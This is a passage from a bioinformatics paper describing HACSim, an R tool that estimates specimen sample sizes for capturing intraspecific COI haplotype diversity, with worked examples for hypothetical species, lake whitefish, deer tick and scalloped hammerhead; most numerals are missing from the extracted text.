, corresponding to a confidence level of %. high levels of statistical confidence (e.g., %) will result in wider confidence intervals; whereas low confidence leads to narrower interval estimates. how does hacsim work? haplotype labels are first randomly placed on a two-dimensional spatial grid of size perms × n (read perms rows by n columns) according to their overall frequency of occurrence (fig. ). the cumulative mean number of haplotypes is then computed along each column (i.e., for every specimen). if all h* haplotypes are not observed, then the grid is expanded to a size of perms×n* and the observed haplotypes enumerated. estimation of specimen sample sizes proceeds iteratively, in which the current value of n* is used as a starting value to the next iteration (fig. ). an analogy here can be made to a game of golf: as one aims towards the hole and hits the ball, it gets closer and closer to the hole; however, one does not know the number of times to hit the ball before it lands in the hole. it is important to note that since sample sizes must be whole values, estimates of n* found at each iteration are rounded up to the next whole number. even though this approach is quite conservative, it ensures that estimates are adequately reflective of the population from which they were drawn. hac.sim(), which is called internally from hac.simrep(), performs a single iteration of haplotype accumulation for a given species. in the case of real species, resulting output reflects current levels of sampling effort found within bold (or another similar sequence repository such as genbank) for a given species. if the desired level of haplotype recovery is not reached, then hac.simrep() is called to perform successive iterations until phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure schematic of the hacsim optimization algorithm (setup, initialization and iteration). shown is a hypothetical example for a species mined from a biological sequence database like bold or genbank with n = sampled specimens (dna sequences) possessing h*= unique haplotypes. each haplotype has an associated numeric id from -h* (here, - ). haplotype labels are randomly assigned to cells on a two-dimensional spatial array (array) with perms rows and n columns. all haplotypes occur with a frequency of %, (i.e., probs= ( / , / , / , / , / )). specimen and haplotype information is then fed into a black box to iteratively optimize the likely required sample size (n*) needed to capture a propor- tion of at least p haplotypes observed in the species sample. full-size doi: . /peerjcs. /fig- the observed fraction of haplotypes captured (r) is at least p. this stopping criterion is the termination condition necessary to halt the algorithm as soon as a ‘‘good enough’’ solution has been found. such criteria are widely employed within numerical analysis. at each step of the algorithm, a dataset, in the form of a dataframe (called ‘‘d’’) consisting of the mean number of haplotypes recovered (called means), along with the estimated standard deviation (sds) and the number of specimens sampled (specs) is generated. the estimated required sample size (n*) to recover a given proportion of observed species haplotypes corresponds to the endpoint of the accumulation curve. an indicator message is additionally outputted informing a user as to whether or not the desired level of haplotype recovery has been reached. the algorithm is depicted in fig. . in fig. , all input parameters are known a priori except hi, which is the number of haplotypes found at each iteration of the algorithm, and ri = hi h∗ , which is the observed fraction of haplotype recovery at iteration i. the equation to compute n* n∗i+ =ni+ ni hi ( h∗−hi ) = nih∗ hi = ni ri ( ) is quite intuitive since as hi approaches h*, h∗−hi approaches zero, ri= hi h∗ approaches one, and consequently, ni approaches n*. in the first part of the above equation, the quantity nihi (h ∗ −hi) is the amount by which the haplotype accumulation curve is extrapolated, which incorporates random error and uncertainty regarding the true value of θ in the search space being explored. nonparametric estimates formed from the above phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure iterative extrapolation algorithm pseudocode for the computation of taxon sampling suffi- ciency employed within hacsim. a user must input n , h* and probs to run simulations. other function arguments required by the algorithm have default values and are not necessary to be inputted unless the user wishes to alter set parameters. full-size doi: . /peerjcs. /fig- iterative method produce a convergent monotonically-increasing sequence, which becomes closer and closer to n* as the number of iterations increase; that is, n∗ ≤n ∗ ≤ ...≤n ∗ i ≤n ∗ i+ →n ∗ ( ) which is clearly a desirable property. since haplotype accumulation curves are bounded below by one and bounded above by h*, then the above sequence has a lower bound equal to the initial guess for specimen sampling sufficiency (n) and an upper bound of n*. along with the iterated haplotype accumulation curves and haplotype frequency barplots, simulation output consists of the five initially proposed ‘‘measures of sampling closeness’’, the estimate of θ (n*) based on phillips et al. ( )’s sampling model, in addition to the number of additional samples needed to recover all estimated total haplotype variation for a given species (n∗−n ; fig. ) (table ). these five quantities are given as follows: ( ) mean number of haplotypes sampled: hi, ( ) mean number of haplotypes not sampled: h∗−hi, ( ) proportion of haplotypes sampled: hih∗ , ( ) proportion of haplotypes not sampled: h∗−hi h∗ , ( ) mean number of individuals not sampled: n∗−ni = ni hi (h∗−hi) and are analogous to absolute and relative approximation error metrics seen in numerical analysis. it should be noted that the mean number of haplotypes captured at each iteration, hi, will not necessary be increasing, even though estimates of the cumulative mean value of n* are. it is easily seen above that hi approaches h* with increasing number of iterations. similarly, as the simulation progresses, h∗−hi, h∗−hi h∗ and n ∗ −ni = ni hi (h∗−hi) all approach zero, while hih∗ approaches one. the rate at which curves approach h* depends on inputs to both hac.sim() and hac.simrep(). once the algorithm has converged to the desired level of haplotype recovery, a summary of findings is outputted consisting of ( ) the initial guess (n) for sampling sufficiency; ( ) the total number of iterations until convergence and simulation runtime (in seconds); ( ) the final estimate (n*) of sampling sufficiency, along with an approximate ( −α) % confidence interval (see next paragraph); and, ( ) the phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure graphical depiction of the iterative extrapolation sampling model as described in detail herein. the figure is modified from phillips, gillis & hanner ( ). the x-axis is meant to depict the number of specimens sampled, whereas the y-axis is meant to convey the cumulative number of unique haplotypes uncovered for every additional individual that is randomly sampled. ni and hi refer respectively to specimen and haplotype numbers that are observed at each iteration ( i) of hacsim for a given species. n* is the total sample size that is needed to capture all h* haplotypes that exist for a species. full-size doi: . /peerjcs. /fig- number of additional specimens required to be sampled (n∗−n) from the initial starting value. iterations are automatically separated by a progress meter for easy visualization. an approximate symmetric ( − α) % ci for θ is derived using the (first order) delta method (casella & berger, ). this approach relies on the asymptotic normality result of the clt and employs a first-order taylor series expansion around θ to arrive at an approximation of the variance (and corresponding standard error) of n*. such an approach is convenient since the sampling distribution of n* would likely be difficult to compute exactly due to specimen sample sizes being highly taxon-dependent. an approximate (large sample) ( −α) % ci for θ is given by n∗±z −α ( σ̂h h √ n∗ ) ( ) where z −α denotes the appropriate critical value from the standard normal distribution and σ̂h is the estimated standard deviation of the mean number of haplotypes recovered at n*. the interval produced by this approach is quite tight, shrinking as hi tends to h*. by default, hacsim computes % confidence intervals for the abovementioned quantities. it is important to consider how a confidence interval for θ should be interpreted. for instance, a % ci for θ of (l, u), where l and u are the lower and upper endpoints of the confidence interval respectively, does not mean that the true sampling sufficiency lies between (l, u) with % probability. instead, resulting confidence intervals for θ are themselves random and should be interpreted in the following way: with repeated sampling, one can be ( − α) % confident that the true sampling sufficency for p% haplotype recovery for a given species lies in the range (l, u) ( − α) % of the time. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. that is, on average, ( − α) % of constructed confidence intervals will contain θ ( − α) % of the time. it should be noted however that as given computed confidence intervals are only approximate in the limit, desired nominal probability coverage may not be achieved. in other words, the proportion of times calculated ( − α) % intervals actually contain θ may not be met. hacsim has been implemented as an object-oriented framework to improve modularity and overall user-friendliness. scenarios of hypothetical and real species are contained within helper functions which comprise all information necessary to run simulations successfully without having to specify certain function arguments beforehand. to carry out simulations of sampling haplotypes from hypothetical species, the function hachypothetical() must first be called. similarly, haplotype sampling for real species is handled by the function hacreal(). in addition to all input parameters rquired by hac.sim() and hac.simrep() outlined in table , both hachypothetical() and hacreal() take further arguments. both functions take the optional argument filename which is used to save results outputted to the r console to a csv file. when either hachypothetical() or hacreal() is invoked (i.e., assigned to a variable), an object herein called hacsobj is created containing the arguments employed by hacsim in running simulations. note the generated object can have any name the user desires. further, all simulation variables are contained in an environment called ‘envr’ that is hidden from the user. results here, we outline some simple examples that highlight the overall functionality of hacsim. when the code below is run, outputted results will likely differ from those depicted here since our method is inherently stochastic. hence, it should be stressed that there is not one single solution for the problem at hand, but rather multiple solutions (spall, ). this is in contrast to a completely deterministic model, where a given input always leads to the same unique output. to ensure reproducibility, the user can set a random seed value using the base r function set.seed() prior to running hac.simrep(). it is important that a user set a working directory in r prior to running hacsim, which will ensure all created files (‘seqs.fas’ and ‘output.csv’) are stored in a single location for easy access and reference at a later time. in all scenarios, default parameters were unchanged (perms= , , p= . ). application of hacsim to hypothetical species equal haplotype frequencies figure shows sample graphical output of the proposed haplotype accumulation curve simulation algorithm for a hypothetical species with n = and h*= . all haplotypes are assumed to occur with equal frequency (i.e., probs= . ). algorithm output is shown below. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ## set parameters for hypothetical species ## > n<- # total number of sampled individuals > hstar<- # total number of haplotypes > probs<-rep( /hstar, hstar) # equal haplotype frequency ### run simulations ### > hacsobj<-hachypothetical(n = n, hstar = hstar, probs = probs) # call helper function # set seed here if desired, e.g., set.seed( ) > hac.simrep(hacsobj) simulating haplotype accumulation... |===============================================================================| % ---measures of sampling closeness --- mean number of haplotypes sampled: mean number of haplotypes not sampled: proportion of haplotypes sampled: proportion of haplotypes not sampled: mean value of n*: mean number of specimens not sampled: desired level of haplotype recovery has been reached ---------- finished. ---------- the initial guess for sampling sufficiency was n = individuals the algorithm converged after iterations and took . s the estimate of sampling sufficiency for p = % haplotype recovery is n* = individuals ( % ci: - ) the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals algorithm output shows that r = % of the h* = haplotypes are recovered from the random sampling of n = individuals, with lower and upper % confidence limits of – . no additional specimens need to be collected (n∗−n = ). simulation results, consisting of the six ‘‘measures of sampling closeness’’ computed at each iteration, can be optionally saved in a comma-separated value (csv) file called ‘output.csv’ (or another filename of the user’s choosing). figure shows that when haplotypes are equally frequent in species populations, corresponding haplotype accumulation curves reach an asymptote very quickly. as sampling effort is increased, the confidence interval becomes narrower, thereby reflecting one’s increased confidence in having likely sampled the majority of haplotype variation existing for a given species. expected counts of the number of specimens possessing a given haplotype can be found from running max(envr$d$specs) * envr$probs in the r console once a simulation has converged. however, real data suggest that haplotype frequencies are not equal. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure graphical output of hac.sim() for a hypothetical species with equal haplotype frequen- cies. (a) iterated haplotype accumulation curve. (b) corresponding haplotype frequency barplot. for the generated haplotype accumulation curve, the % confidence interval for the number of unique haplo- types accumulated is depicted by gray error bars. dashed lines depict the observed number of haplotypes (i.e., rh*) and corresponding number of individuals sampled found at each iteration of the algorithm. the dotted line depicts the expected number of haplotypes for a given haplotype recovery level (here, p= %) (i.e., ph*). in this example, r= % of the h*= estimated haplotypes have been recovered for this species based on a sample size of only n = specimens. full-size doi: . /peerjcs. /fig- unequal haplotype frequencies figures and show sample graphical output of the proposed haplotype accumulation curve simulation algorithm for a hypothetical species with n = and h* = . all haplotypes occur with unequal frequency. haplotypes – each have a frequency of %, while the remaining seven haplotypes each occur with a frequency of c. . %. ## set parameters for hypothetical species ## > n<- > hstar<- > probs<-c(rep( . , ), rep( . / , )) # three dominant haplotypes each with % frequency ### run simulations ### > hacsobj<-hachypothetical(n = n, hstar = hstar, probs = probs) > hac.simrep(hacsobj) simulating haplotype accumulation... |========================================================================| % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. desired level of haplotype recovery has not yet been reached |================================================================| % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has not yet been reached |==================================================================| % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has been reached ---------- finished. ---------- the initial guess for sampling sufficiency was n = individuals the algorithm converged after iterations and took . s the estimate of sampling sufficiency for p = % haplotype recovery is n∗ = individuals ( % ci: . - . ) the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals note that not all iterations are displayed above for the sake of brevity; only the first and last two iterations are given. with an initial guess of n = , only r= . % of all h* = observed haplotypes are recovered. the value of n* = in the first iteration above serves as an improved initial guess of the true sampling sufficiency, which is an unknown quantity that is being estimated. this value is then fed back into the algorithm and the process is repeated until convergence is reached. usingeq. ( ),theimprovedsamplesizewascalculatedasn∗= + . ( − . )= . . after one iteration, the curve has been extrapolated by an additional n∗−ni= . individuals. upon convergence, r= . % of all observed haplotypes are captured with a sample size of n*= specimens, with a % ci of . – . . given that n = individuals have already been sampled, the number of additional specimens required is n∗−n = individuals. the user can verify that sample sizes close to that found by hacsim are needed to capture % of existing haplotype variation. simply set n = n* = and rerun the algorithm. the last iteration serves as a check to verify that the desired level of haplotype recovery has been achieved. the value of n*= . that is outputted at this step can be used as a good starting guess to extrapolate the curve phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure initial graphical output of hac.sim() for a hypothetical species having three dominant hap- lotypes. (a) specimens sampled; (b) unique haplotypes. in this example, initially, only r = . % of the h*= estimated haplotypes have been recovered for this species based on a sample size of n = specimens. full-size doi: . /peerjcs. /fig- figure final graphical output of hac.sim() for a hypothetical species having three dominant haplo- types. (a) specimens sampled; (b) unique haplotypes. in this example, upon convergence, r= . % of the h*= estimated haplotypes have been recovered for this species based on a sample size of n = specimens. full-size doi: . /peerjcs. /fig- to higher levels of haplotype recovery to save on the number of iterations required to reach convergence. to do this, one simply runs hachypothetical() with n = . application of hacsim to real species because the proposed iterative haplotype accumulation curve simulation algorithm simply treats haplotypes as numeric labels, it is easily generalized to any biological taxa and genetic loci for which a large number of high-quality dna sequence data records is available in public databases such as bold. in the following examples, hacsim is employed to examine levels of standing genetic variation within animal species using ′-coi. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. lake whitefish (coregonus clupeaformis) an interesting case study on which to focus is that of lake whitefish (coregonus clupeaformis). lake whitefish are a commercially, culturally, ecologically and economically important group of salmonid fishes found throughout the laurentian great lakes in canada and the united states, particularly to the saugeen ojibway first nation (son) of bruce peninsula in ontario, canada, as well as non-indigenous fisheries (ryan & crawford, ). the colonization of refugia during pleistocene glaciation is thought to have resulted in high levels of cryptic species diversity in north american freshwater fishes (hubert et al., ; april et al., ; april et al., a; april et al., b). overdyk et al. ( ) wished to investigate this hypothesis in larval lake huron lake whitefish. despite limited levels of gene flow and likely formation of novel divergent haplotypes in this species, surprisingly, no evidence of deep evolutionary lineages was observed across the three major basins of lake huron despite marked differences in larval phenotype and adult fish spawning behaviour (overdyk et al., ). this may be the result of limited sampling of intraspecific genetic variation, in addition to presumed panmixia (overdyk et al., ). while lake whitefish represent one of the most well-studied fishes within bold, sampling effort for this species has nevertheless remained relatively static over the past few years. thus, lake whitefish represent an ideal species for further exploration using hacsim. in applying the developed algorithm to real species, sequence data preparation methodology followed that which is outlined in phillips et al. ( ). curation included the exclusion of specimens linked to genbank entries, since those records without the barcode keyword designation lack appropriate metadata central to reference sequence library construction and management (hanner, ). our approach here was solely to assess comprehensiveness of single genomic sequence databases rather than incorporating sequence data from multiple repositories; thus, all dna barcode sequences either originating from, or submitted to genbank were not considered further. as well, the presence of base ambiguities and gaps/indels within sequence alignments can lead to bias in estimate haplotype diversity for a given species. currently (as of november , ), bold contains public (both barcode and non-barcode) records for c. clupeaformis specimens collected from lake huron in northern parts of ontario, canada and michigan, usa. of the barcode sequences, n = are of high quality (full-length ( bp) and comprise no missing and/or ambiguous nucleotide bases). haplotype analysis reveals that this species currently comprises h*= unique coi haplotypes. further, this species shows a highly-skewed haplotype frequency distribution, with a single dominant haplotype accounting for c. . % ( / ) of all individuals (fig. ). the output of hacsim is displayed below. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ### run simulations ### > hacsobj<-hacreal() > hac.simrep(hacsobj) simulating haplotype accumulation... | =====================================================| % --- measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has not yet been reached | =======================================================| % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has not yet been reached | ==========================================================| % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has been reached ---------- finished. ---------- the initial guess for sampling sufficiency was n = individuals the algorithm converged after iterations and took . s the estimate of sampling sufficiency for p = % haplotype recovery is n∗= individuals ( % ci: . - . ) the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals from the above output, it is clear that current specimen sample sizes found within bold for c. clupeaformis are probably not sufficient to capture the majority of within-species coi haplotype variation. an initial sample size of n = specimens corresponds to recovering only . % of all h* = unique haplotypes for this species (fig. ). phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure initial haplotype frequency distribution for n = high-quality lake whitefish (coregonus clupeaformis) coi barcode sequences obtained from bold. this species displays a highly-skewed pat- tern of observed haplotype variation, with haplotype accounting for c. . % ( / ) of all sampled records. full-size doi: . /peerjcs. /fig- figure initial graphical output of hac.sim() for a real species (lake whitefish, c. clupeaformis) hav- ing a single dominant haplotype. (a) specimens sampled; (b) unique haplotypes. in this example, ini- tially, only r= . % of the h*= estimated haplotypes for this species have been recovered based on a sample size of n = specimens. the haplotype frequency barplot is identical to that of fig. . full-size doi: . /peerjcs. /fig- a sample size of n* = individuals ( % ci [ . – . ]) would likely be needed to observe % of all existing genetic diversity for lake whitefish (fig. ). since n = individuals have been sampled previously, only n∗−n = specimens remain to be collected. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure final graphical output of hac.sim() for lake whitefish (c. clupeaformis) having a single dominant haplotype. (a) specimens sampled; (b) unique haplotypes. upon convergence, r = . % of the h*= estimated haplotypes for this species have been uncovered with a sample size of n = specimens. full-size doi: . /peerjcs. /fig- deer tick (ixodes scapularis) ticks, particularly the hard-bodied ticks (arachnida: acari: ixodida: ixodidae), are well- known as vectors of various zoonotic diseases including lyme disease (ondrejicka et al., ). apart from this defining characteristic, the morphological identification of ticks at any lifestage, by even expert taxonomists, is notoriously difficult or sometimes even impossible (ondrejicka, morey & hanner, ). further, the presence of likely high cryptic species diversity in this group means that turning to molecular techniques such as dna barcoding is often the only feasible option for reliable species diagnosis. lyme-competent specimens can be accurately detected through employing a sensitive quantitative pcr (qpcr) procedure (ondrejicka, morey & hanner, ). however, for such a workflow to be successful, wide coverage of within-species haplotype variation from across broad geographic ranges is paramount to better aid design of primer and probe sets for rapid species discrimination. furthermore, the availability of large specimen sample sizes for tick species of medical and epidemiological relevance is necessary for accurately assessing the presence of the barcode gap. notably, the deer tick (ixodes scapularis), native to canada and the united states, is the primary carrier of borrelia burgdorferi, the bacterium responsible for causing lyme disease in humans in these regions. because of this, i. scapularis has been the subject of intensive taxonomic study in recent years. for instance, in a recent dna barcoding study of medically-relevant canadian ticks, ondrejicka, morey & hanner ( ) found that out of eight specimens assessed for the presence of b. burgdorferi, % tested positive. however, as only exoskeletons and a single leg were examined for systemic infection, the reported infection rate may be a lower bound due to the fact that examined specimens may still harbour b. burgdorferi in their gut. as such, this species is well-represented within bold and thus warrants further examination within the present study. as of august , , ′-coi dna barcode sequences are accessble from bold’s public data portal for this species. of these, n = met criteria for high quality phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. outlined in phillips et al. ( ). a bp muscle alignment comprised h*= unique haplotypes. haplotype analysis revealed that haplotypes – were represented by more than specimens (range: – ; fig. ). simulation output of hacsim is depicted below. ### run simulations ### > hacsobj<-hacreal() > hac.simrep(hacsobj) simulating haplotype accumulation... | ======================================================| % --- measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has not yet been reached | ============================================| % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has not yet been reached | =========================================================| % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has been reached ---------- finished. ---------- the initial guess for sampling sufficiency was n = individuals the algorithm converged after iterations and took . s the estimate of sampling sufficiency for p = % haplotype recovery is n∗= individuals ( % ci: . - . ) the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure initial haplotype frequency distribution for n = high-quality deer tick (ixodes scapu- laris) coi barcode sequences obtained from bold. in this species, haplotypes - account for c. . % ( / ) of all sampled records. full-size doi: . /peerjcs. /fig- figure initial graphical output of hac.sim() for a real species (deer tick, i. scapularis) having eight dominant haplotypes. in this example, initially, only r= . % of the h*= estimated haplotypes for this species have been recovered based on a sample size of n = specimens. the haplotype frequency barplot is identical to that of fig. . full-size doi: . /peerjcs. /fig- the above results clearly demonstrate the need for increased specimen sample sizes in deer ticks. with an initial sample size of n = individuals, only . % of all observed haplotypes are recovered for this species (fig. ). n*= specimens ( % ci: . - . ) is necessary to capture at least % of standing haplotype variation for i. scapularis (fig. ) . thus, a further n*−n = specimens are required to be collected. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure final graphical output of hac.sim() for deer tick (i scapularis) having eight dominant hap- lotypes. upon convergence, r = . % of the h*= estimated haplotypes for this species have been uncovered with a sample size of n = specimens. full-size doi: . /peerjcs. /fig- scalloped hammerhead (sphyrna lewini) sharks (chondrichthyes: elasmobranchii: selachimorpha) represent one of the most ancient extant lineages of fishes. despite this, many shark species face immediate extinction as a result of overexploitation, together with a unique life history (e.g., k-selected, predominant viviparity, long gestation period, lengthy time to maturation) and migration behaviour (hanner, naaum & shivji, ). a large part of the problem stems from the increasing consumer demand for, and illegal trade of, shark fins, meat and bycatch on the asian market. the widespread, albeit lucrative practice of ‘‘finning’’, whereby live sharks are definned and immediately released, has led to the rapid decline of once stable populations (steinke et al., ). as a result, numerous shark species are currently listed by the international union for the conservation of nature (iucn) and the convention on international trade in endangered species of wild fauna and flora (cites). interest in the molecular identification of sharks through dna barcoding is multifold. the coi reference sequence library for this group remains largely incomplete. further, many shark species exhibit high intraspecific distances within their barcodes, suggesting the possibility of cryptic species diversity. instances of hybridization between sympatric species has also been documented. as establishing species-level matches to partial specimens through morphology alone is difficult, and such a task becomes impossible once fins are processed and sold for consumption or use in traditional medicine, dna barcoding has paved a clear path forward for unequivocal diagnosis in most cases. the endangered hammerheads (family: sphyrnidae) represent one of the most well- sampled groups of sharks within bold to date. fins of the scalloped hammerhead (sphyrna lewini) are especially highly prized within iuu (illegal, unregulated, unreported) fisheries due to their inclusion as the main ingredient in shark fin soup. as of august , , s. lewini specimens (sequenced at both barcode and non- barcode markers), collected from several food and agriculture organization (fao) regions, including the united states, are available through bold’s public data portal. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. of these, all high-quality records (n = ) were selected for alignment in mega and assessment via hacsim. the final alignment was found to comprise h* = unique haplotypes, of which three were represented by or more specimens (range: – ; fig. ). hacsim results are displayed below. ### run simulations ### > hacsobj<-hacreal() > hac.simrep(hacsobj) simulating haplotype accumulation... | ======================================================| % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has not yet been reached ===================================================== % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has not yet been reached ===================================================== % ---measures of sampling closeness --- mean number of haplotypes sampled: . mean number of haplotypes not sampled: . proportion of haplotypes sampled: . proportion of haplotypes not sampled: . mean value of n*: . mean number of specimens not sampled: . desired level of haplotype recovery has been reached ---------- finished. ---------- the initial guess for sampling sufficiency was n = individuals the algorithm converged after iterations and took . s the estimate of sampling sufficiency for p = % haplotype recovery is n* = individuals ( % ci: . - . ) the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure initial haplotype frequency distribution for n = high-quality scalloped hammerhead (sphyrna lewini) coi barcode sequences obtained from bold. in this species, haplotypes – account for c. . % ( / ) of all sampled records. full-size doi: . /peerjcs. /fig- figure initial graphical output of hac.sim() for a real species (scalloped hammerhead, s. lewini) having three dominant haplotypes. in this example, initially, only r = . % of the h*= estimated haplotypes for this species have been recovered based on a sample size of n = specimens. the haplo- type frequency barplot is identical to that of fig. . full-size doi: . /peerjcs. /fig- simulation output suggests that only . % of all unique haplotypes for the scalloped hammerhead have likely been recovered (fig. ) with a sample size of n = . further, hacsim predicts that n* = individuals ( % ci [ . – . ]) probably need to be randomly sampled to capture the majority of intraspecific genetic diversity within ′-coi (fig. ). since specimens have already been collected, this leaves an additional n* − n = individuals which await sampling. phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure final graphical output of hac.sim() for scalloped hammerhead (s. lewini) having three dominant haplotypes. upon convergence, r = . % of the h*= estimated haplotypes for this species have been uncovered with a sample size of n = specimens. full-size doi: . /peerjcs. /fig- discussion initializing hacsim and overall algorithm behaviour the overall stochastic behaviour of hacsim is highly dependent on the number of permutations used upon algorithm initialization. provided that the value assigned to the perms argument is set high enough, numerical results ouputted by hacsim will be found to be quite consistent between consecutive runs whenever all remaining parameter values remain unchanged. it is crucial that perms not be set to too low a value to prevent the algorithm from getting stuck at local maxima and returning suboptimal solutions. this is a common situation with popular optimization algorithms such as hill-climbing. attention therfore must be paid to avoid making generalizations based on algorithm performance and obtained simulation results (spall, ). in applying the present method to simulated species data, it is important that selected simulation parameters are adequately reflective of those observed for real species. thus, initial sample sizes should be chosen to cover a wide range of values based on those currently observed within bold. such information can be gauged through examining species lists associated with bold records, which are readily accessible through linnean search queries within the taxonomy browser. as with any iterative numerical algorithm, selecting good starting guesses for initialization is key. while hacsim is globally convergent (i.e., convergence is guaranteed for any value of n ≥ h*), a good strategy when simulating hypothetical species is to start the algorithm by setting n = h*. in this way, the observed fraction of haplotypes found, r, will not exceed the desired level of haplotype recovery p, and therefore lead to overestimation of likely required specimen sample sizes. setting n high enough will almost surely result in r exceeding p. thus, arbitrarily large values of n may not be biologically meaningful or practical. however, in the case of hypothetical species simulation, should initial sample sizes be set too high, such that r > p, a straightforward workaround is to observe where the dashed horizontal line intersects the final haplotype accumulation curve phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (i.e., not the line the touches the curve endpoint). the resulting value of n at this point will correspond with p quite closely. this can be seen in fig. , where an eyeball guess just over n* = individuals is necessary to recover p = % haplotype variation. a more reliable estimate can be obtained through examining the dataframe ‘‘d’’ outputted once the algorithm has halted (via envr$d). in this situation, simply look in the row corresponding to ph* ≥ . ( ) ≥ . . the required sample size is the value given in the first column (specs). this is accomplished via the r code envr$d[which(envr$d$means >= envr$p * envr$hstar), ][ , ]. the novelty of hacsim is that it offers a systematic means of estimating likely specimen sample sizes required to assess intraspecific haplotype diversity for taxa within large-scale genomic databases like genbank and bold. estimates of sufficient sampling suggested by our algorithm can be employed to assess barcode coverage within existing reference sequence libraries and campaign projects found in bold. while comparison of our method to already-established ones is not yet possible, we anticipate that hacsim will nevertheless provide regulatory applications with an unprecedented view and greater understanding of the state of standing genetic diversity (or lack thereof) within species. additional capabilities and extending functionality of hacsim in this paper, we illustrate the application of haplotype accumulation curves to the broad assessment of species-level genetic variation. however, hacsim is quite flexible in that one can easily explore likely required sample sizes at higher taxonomic levels (e.g., order, family, genus) or specific geographic regions (e.g., salmonids of the great lakes) with ease. such applicability will undoubtedly be of interest at larger scales (i.e.. entire genomic sequence libraries). for instance, due to evidence of sampling bias in otherwise densely-sampled taxa housed in bold (e.g., lepidoptera), d’ercole et al. (j. d’ercole, , unpublished data) wished to assess whether or not intraspecific haplotype variation within butterfly species remains unsampled. to test this, the authors employed hacsim to examine sampling comprehensiveness for species comprising a large barcode reference library for north american butterflies spanning species and , specimens. we foresee use of hacsim being widespread within the dna barcoding community. as such, improvements to existing code in terms of further optimization and algorithm runtime, as well as implementation of new 